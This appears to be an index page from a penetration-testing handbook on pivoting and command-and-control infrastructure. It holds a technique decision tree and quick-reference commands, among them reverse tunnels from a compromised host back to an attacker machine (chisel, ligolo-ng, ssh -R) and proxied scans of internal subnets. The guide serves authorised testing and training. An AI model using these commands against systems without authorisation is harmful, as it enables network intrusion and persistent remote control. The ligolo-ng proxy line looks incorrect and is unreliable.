14 - Pivoting & C2 Infrastructure
#Overview
Pivoting transforms a single compromised host into a beachhead for the entire internal network. C2 infrastructure provides the persistent, resilient command and control layer that keeps that beachhead operational. This module covers both domains in depth: advanced tunneling and proxy techniques for reaching segmented networks, and C2 framework setup with redirector infrastructure for sustaining long-duration operations.
For the foundational pivoting quick-reference (SSH -D/-L/-R, Chisel, Ligolo-ng, socat, netsh, proxychains, Metasploit autoroute), see 07 - Post-Exploitation. This module extends that foundation with advanced tools, multi-hop chains, and operational C2 infrastructure.
#Decision Tree: Pivoting Technique Selection
Compromised Host with Internal Network Access
|
v
Network Enumeration Complete?
NO ---> [Network Enumeration](network-enumeration.md) (interfaces, routes, ARP, IPv6)
YES ---> What type of access needed?
|
|-- Full subnet access (scan, multiple services)
| |-- SOCKS proxy ---> [SOCKS & HTTP Proxies](tunnels-and-proxies/socks-and-http-proxies.md)
| |-- HTTP-only egress ---> [Web Tunnels](tunnels-and-proxies/web-tunnels.md)
| |-- DNS-only egress ---> [DNS & Protocol Tunnels](tunnels-and-proxies/dns-and-protocol-tunnels.md)
| |-- Cloud egress ---> [Cloud Tunnels](tunnels-and-proxies/cloud-tunnels.md)
|
|-- Single port or specific service
| |-- SSH available ---> [SSH Port Forwarding](port-forwarding/ssh-port-forwarding.md)
| |-- Native OS tools ---> [Native Port Forwarding](port-forwarding/native-port-forwarding.md)
| |-- Meterpreter session ---> [Metasploit Routing](port-forwarding/metasploit-routing.md)
|
|-- Multiple network segments (2+ hops)
| |-- [Multi-Hop Chains](multi-hop-chains/index.md)
| |-- Docker container pivot ---> [Docker & IPv6 Pivoting](multi-hop-chains/docker-and-ipv6-pivoting.md)
| |-- Platform-specific ---> [Platform Strategies](multi-hop-chains/platform-strategies.md)
|
|-- Need persistent C2 channel
|-- [C2 Infrastructure](c2-infrastructure/index.md)
|-- Framework setup ---> [C2 Framework Setup](c2-infrastructure/c2-framework-setup.md)
|-- Redirectors ---> [Redirectors & Fronting](c2-infrastructure/redirectors-and-fronting.md)
|-- Payload delivery ---> [Payload Staging](c2-infrastructure/payload-staging.md)
TEXT
#General Methodology
#1. Enumerate the Network (Mandatory)
Before pivoting, understand what you're pivoting into. See Network Enumeration.
#2. Select the Least Noisy Technique
| Priority | Technique | When to Use |
|---|---|---|
| 1 | SSH -D/-L/-R | SSH available, no egress restrictions |
| 2 | SSHuttle | Linux target, need transparent routing |
| 3 | Chisel/Ligolo-ng | SSH not available or cross-platform needed |
| 4 | Web tunnel | HTTP-only egress |
| 5 | DNS tunnel | DNS-only egress |
| 6 | Cloud tunnel | Cloud egress available, need persistence |
| 7 | Metasploit autoroute | Meterpreter session active |
#3. Validate the Pivot
# After establishing a pivot, verify:
# 1. Can you reach the target subnet?
proxychains4 nmap -sn 172.16.0.0/24
# 2. Can you access target services?
proxychains4 curl -s http://172.16.0.10:8080/
# 3. Is the pivot stable?
# Test with a long-running connection
proxychains4 ssh user@172.16.0.10 "sleep 60 && echo stable"
BASH
#4. Document the Pivot Chain
Always document the full pivot chain for the report:
- Source IP and port of each hop
- Tool and configuration used
- Credentials or keys required
- Network segments traversed
#What's in This Section
| Sub-Section | Covers |
|---|---|
| Network Enumeration | Interfaces, routes, ARP, IPv6, egress testing, firewall discovery |
| Tunnels & Proxies | SOCKS & HTTP, Web tunnels, DNS & protocol tunnels, Cloud tunnels |
| Port Forwarding | SSH forwarding, Native OS forwarding, Metasploit routing |
| Multi-Hop Chains | Proxy chaining, Docker & IPv6 pivoting, Platform strategies |
| C2 Infrastructure | Framework setup, Redirectors & fronting, Payload staging |
#Cross-References
- 07 - Post-Exploitation — Foundational pivoting quick-reference (SSH -D/-L/-R, Chisel, Ligolo-ng, socat, proxychains)
- 09 - Lateral Movement — After pivoting, use lateral movement techniques to spread
- 10 - Persistence — C2 persistence mechanisms
- 13 - Wireless Pentesting — Network segmentation bypass before pivoting
#Quick Reference: Essential Commands
# ── SOCKS Proxy (SSH) ──
ssh -D 1080 user@pivot # Dynamic SOCKS proxy
proxychains4 nmap -sn 172.16.0.0/24 # Route through SOCKS
# ── SSH Port Forwarding ──
ssh -L 8080:172.16.0.10:80 user@pivot # Local forward
ssh -R 8080:127.0.0.1:80 user@attacker # Remote forward
ssh -J pivot1,pivot2 user@target # ProxyJump chain
# ── SSHuttle (Transparent) ──
sshuttle -r user@pivot 172.16.0.0/24 # Transparent VPN-like proxy
# ── Chisel ──
chisel server -p 8080 --reverse # Server (attacker)
chisel client <attacker>:8080 R:socks # Client (pivot)
# ── Ligolo-ng ──
sudo proxychains4 ligolo-ng -selfcert # Proxy (attacker)
./agent -connect <attacker>:11601 -ignore-cert # Agent (pivot)
# ── netsh (Windows) ──
netsh interface portproxy add v4tov4 listenport=8080 connectaddress=172.16.0.10 connectport=80
# ── socat ──
socat TCP-LISTEN:8080,fork TCP:172.16.0.10:80 # TCP relay
# ── Egress Testing ──
curl -s http://<external_ip>:<port> --connect-timeout 5 # Test TCP egress
nslookup <external_domain> # Test DNS egress
BASH